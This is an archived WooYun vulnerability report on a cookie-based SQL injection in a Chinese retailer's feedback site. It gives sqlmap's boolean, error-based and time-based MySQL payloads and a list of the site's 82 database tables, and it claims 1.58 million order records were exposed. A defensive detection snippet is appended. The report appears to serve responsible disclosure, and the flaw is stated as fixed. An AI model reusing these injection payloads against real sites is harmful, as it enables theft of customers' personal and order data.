WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online ----------------------- http://drop.zone.ci/
2015-10-25: Details reported to the vendor; awaiting vendor handling
2015-10-27: Vendor confirmed; details disclosed to the vendor only
2015-11-06: Details disclosed to core white hats and relevant domain experts
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public
GET /feedback/ HTTP/1.1
Cookie: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=1*; tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0
Host: voc.mbaobao.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Injection point: the login_user_id parameter in the Cookie header (the trailing * after login_user_id=1 is sqlmap's custom injection marker; note the same cookie name is also sent twice more with the value 0).
18 databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=(SELECT (CASE WHEN (9164=9164) THEN 9164 ELSE 9164*(SELECT 9164 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)); tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=1 AND (SELECT 2041 FROM(SELECT COUNT(*),CONCAT(0x7176626b71,(SELECT (ELT(2041=2041,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a); tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rusd); tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: db_baobao178
[82 tables]
+---------------------------------------+
| basic_encrypted_data                  |
| mshop_order_queue                     |
| tbl_ads                               |
| tbl_announcement                      |
| tbl_apply                             |
| tbl_apps_log                          |
| tbl_attestation                       |
| tbl_complaint                         |
| tbl_configure                         |
| tbl_delivery                          |
| tbl_delivery_price                    |
| tbl_download                          |
| tbl_faq                               |
| tbl_goods                             |
| tbl_goods_attribute                   |
| tbl_goods_attribute_list              |
| tbl_goods_bk20120109                  |
| tbl_goods_brand                       |
| tbl_goods_category                    |
| tbl_goods_deliver                     |
| tbl_goods_down_log                    |
| tbl_goods_forbidden                   |
| tbl_goods_group                       |
| tbl_goods_hot_sale                    |
| tbl_goods_image                       |
| tbl_goods_order                       |
| tbl_goods_order_item                  |
| tbl_goods_order_pay                   |
| tbl_goods_permission_group            |
| tbl_goods_permission_group_bk20120109 |
| tbl_goods_promotion                   |
| tbl_goods_promotion_favorable         |
| tbl_goods_sale_list                   |
| tbl_goods_search_keyword              |
| tbl_goods_special                     |
| tbl_goods_stock_v2                    |
| tbl_goods_supply_log                  |
| tbl_letter                            |
| tbl_letter_log                        |
| tbl_links                             |
| tbl_maibao                            |
| tbl_maibao_type                       |
| tbl_manager                           |
| tbl_material_download                 |
| tbl_new_seckill                       |
| tbl_news                              |
| tbl_news_category                     |
| tbl_order_favorable                   |
| tbl_order_returned                    |
| tbl_order_returned_goods              |
| tbl_question                          |
| tbl_question_data                     |
| tbl_question_notice                   |
| tbl_question_quickreply               |
| tbl_region                            |
| tbl_return_goods_item                 |
| tbl_return_order                      |
| tbl_return_order_amount               |
| tbl_return_order_item                 |
| tbl_salers                            |
| tbl_seckill                           |
| tbl_split_shipment                    |
| tbl_split_shipment_item               |
| tbl_stockout_register                 |
| tbl_taobao_order_tmp                  |
| tbl_update_revision_survey            |
| tbl_user                              |
| tbl_user_activity_apply               |
| tbl_user_alone_discount               |
| tbl_user_bk20120106                   |
| tbl_user_bk20120109                   |
| tbl_user_bk20120209                   |
| tbl_user_bk20120214                   |
| tbl_user_bk20120218                   |
| tbl_user_consignee                    |
| tbl_user_consignee_20110602           |
| tbl_user_favorites                    |
| tbl_user_level                        |
| tbl_user_vote                         |
| tbl_user_xiyou                        |
| tbl_vote                              |
| xiyou_test4                           |
+---------------------------------------+
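A defender-side check for the request shape shown above, added here as an example and not part of the report: it parses the Cookie header while keeping duplicate names, enforces that integer cookies such as login_user_id stay numeric, and matches the three injection techniques sqlmap listed. SAMPLE_REQUEST and the NUMERIC_COOKIES allowlist are constructed assumptions; the cookie names come from the report.

```python
import re

# Constructed sample request modelled on the one in the report (cookie values
# shortened); login_user_id carries the time-based probe sqlmap reported.
SAMPLE_REQUEST = (
    "GET /feedback/ HTTP/1.1\r\n"
    "Host: voc.mbaobao.com\r\n"
    "Cookie: PHPSESSID=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; "
    "login_user_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rusd); "
    "online_type=1; login_user_id=0; login_user_id=0\r\n\r\n"
)

# Shapes of the three techniques in the sqlmap output above.
SQLI_SIGNATURES = {
    "boolean-based": re.compile(r"\bCASE\s+WHEN\b.*\bTHEN\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

# Cookies the application should only ever read as integers (assumed set).
NUMERIC_COOKIES = {"login_user_id", "online_type", "tid"}


def parse_cookies(request: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs from the Cookie header, keeping duplicates in order."""
    for line in request.split("\r\n"):
        if line.lower().startswith("cookie:"):
            pairs = []
            for item in line.split(":", 1)[1].split(";"):
                if "=" in item:
                    name, value = item.split("=", 1)
                    pairs.append((name.strip(), value.strip()))
            return pairs
    return []


def audit_cookies(request: str) -> list[str]:
    """Flag cookie values that fail the integer allowlist or match an injection shape."""
    findings, seen = [], {}
    for name, value in parse_cookies(request):
        seen[name] = seen.get(name, 0) + 1
        if name in NUMERIC_COOKIES and not value.isdigit():
            findings.append(f"{name}: non-numeric value")
        for technique, pattern in SQLI_SIGNATURES.items():
            if pattern.search(value):
                findings.append(f"{name}: {technique} injection pattern")
    for name, count in seen.items():
        if count > 1:
            findings.append(f"{name}: sent {count} times (duplicate cookie name)")
    return findings
```

Flagging probes at the edge is a detection aid only; the fix is to cast login_user_id to an integer and bind it as a query parameter in the PHP handler rather than interpolating the cookie value into SQL.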
1.58 million order records:
One record pulled as proof:
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-10-27 15:10
Fixed; thanks to the reporter.
None yet.